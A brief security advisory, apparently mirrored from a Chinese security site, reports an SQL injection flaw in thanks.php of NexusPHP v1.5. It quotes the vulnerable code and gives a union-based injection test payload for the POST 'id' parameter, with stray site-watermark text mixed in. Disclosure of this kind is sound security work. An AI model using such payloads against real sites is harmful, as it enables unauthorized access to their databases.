标题: Nexusphp.v1.5 SQL injection Vulnerability
作者: flyh4t HdhCmsTest2cto测试数据
下载 地址: http://sourceforge.net/projects/nexusphp/
影响版本: nexusphp.v1.5
测试平台: linux+apache
Nexusphp is BitTorrent private tracker scripts written in PHP
源码 下载:http://sourceforge.net/projects/nexusphp/
thanks.php存在一些sql注射缺陷
-----------------------代码分析-------------------
//thanks.php
if ($_GET['id'])
stderr("Party is over!", "This trick doesn't work anymore. You need to click the button!");
$userid = $CURUSER["id"];
$torrentid = $_POST["id"];
$tsql = sql_query("SELECT owner FROM torrents where id=$torrentid");
$arr = mysql _fetch_array($tsql);
-----------------------end-------------------
$_POST["id"] is not checked, lead a sql injection Vulnerability
-----------------------测试-------------------
_POST[id] : -1 union select version()>4/* HdhCmsTest2cto测试数据
-----------------------end -------------------
修复:checked
查看更多关于NexusPHP v1.5 SQL注射缺陷及修复 - 网站安全 - 自学的详细内容...